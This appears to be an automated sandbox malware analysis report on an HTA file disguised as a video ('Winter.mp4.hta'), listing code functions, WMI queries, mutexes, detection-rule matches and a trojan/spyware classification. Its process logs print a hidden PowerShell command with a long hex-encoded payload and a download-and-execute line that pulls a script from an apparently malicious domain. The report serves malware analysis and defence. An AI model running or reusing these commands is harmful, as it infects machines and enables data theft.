Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00526240	8_2_00526240
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00501A70	8_2_00501A70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_005123B0	8_2_005123B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_005004AC	8_2_005004AC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00515560	8_2_00515560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_005265E0	8_2_005265E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00508592	8_2_00508592
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004F8640	8_2_004F8640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0051B744	8_2_0051B744
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00501056	8_2_00501056
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0051A040	8_2_0051A040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0051F870	8_2_0051F870
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00513076	8_2_00513076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0052D810	8_2_0052D810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0052D020	8_2_0052D020
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_005068F7	8_2_005068F7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00517897	8_2_00517897
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0050D080	8_2_0050D080
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0052D0B0	8_2_0052D0B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004FA8B0	8_2_004FA8B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004F5940	8_2_004F5940
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0051514E	8_2_0051514E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0052E110	8_2_0052E110
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0051690B	8_2_0051690B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004F3920	8_2_004F3920
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0052A120	8_2_0052A120
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_005111C0	8_2_005111C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_005159F0	8_2_005159F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_005271E0	8_2_005271E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004F61A0	8_2_004F61A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00509270	8_2_00509270
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0052CA70	8_2_0052CA70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004FCA63	8_2_004FCA63
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004F9210	8_2_004F9210
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00525AD0	8_2_00525AD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004FB2DC	8_2_004FB2DC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004F42D0	8_2_004F42D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0052DAE0	8_2_0052DAE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00515AE5	8_2_00515AE5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0051BA95	8_2_0051BA95
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0052B2A0	8_2_0052B2A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0050D350	8_2_0050D350
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0051514E	8_2_0051514E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00514B4E	8_2_00514B4E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004FB30C	8_2_004FB30C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00517897	8_2_00517897
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0051C30F	8_2_0051C30F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00521320	8_2_00521320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00527B2A	8_2_00527B2A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_005163D6	8_2_005163D6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0051ABC9	8_2_0051ABC9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0051A3C8	8_2_0051A3C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00512B80	8_2_00512B80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0052BBBE	8_2_0052BBBE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00511C71	8_2_00511C71
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0050E460	8_2_0050E460
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0052AC63	8_2_0052AC63
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004F4C00	8_2_004F4C00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004F7410	8_2_004F7410
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_005184DF	8_2_005184DF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_005244F1	8_2_005244F1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004FB4E6	8_2_004FB4E6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004FB4E6	8_2_004FB4E6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00504D7D	8_2_00504D7D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00517560	8_2_00517560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00525D30	8_2_00525D30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00515DD7	8_2_00515DD7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004F95D0	8_2_004F95D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0052DDF0	8_2_0052DDF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00504580	8_2_00504580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_005075BE	8_2_005075BE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0052CDA0	8_2_0052CDA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00505E4D	8_2_00505E4D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00524E60	8_2_00524E60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004F5E00	8_2_004F5E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0051DE29	8_2_0051DE29
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0052AE2E	8_2_0052AE2E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004F6630	8_2_004F6630
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0050C6D0	8_2_0050C6D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0052CEC0	8_2_0052CEC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_005136E0	8_2_005136E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00518751	8_2_00518751
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00501753	8_2_00501753
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0051D73D	8_2_0051D73D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004F2F20	8_2_004F2F20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0050B7E0	8_2_0050B7E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00504F80	8_2_00504F80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00503FB0	8_2_00503FB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00511FB0	8_2_00511FB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00511FAE	8_2_00511FAE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: String function: 004F7FC0 appears 36 times
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: String function: 00503FA0 appears 56 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 3823
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 3823			Jump to behavior

Source: Process Memory Space: powershell.exe PID: 6624, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.evad.winHTA@9/6@3/3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_005265E0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

8_2_005265E0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rlhpakclzrt

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scexr12o.sg5.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Winter.mp4.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B09326
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B09326	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))}	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
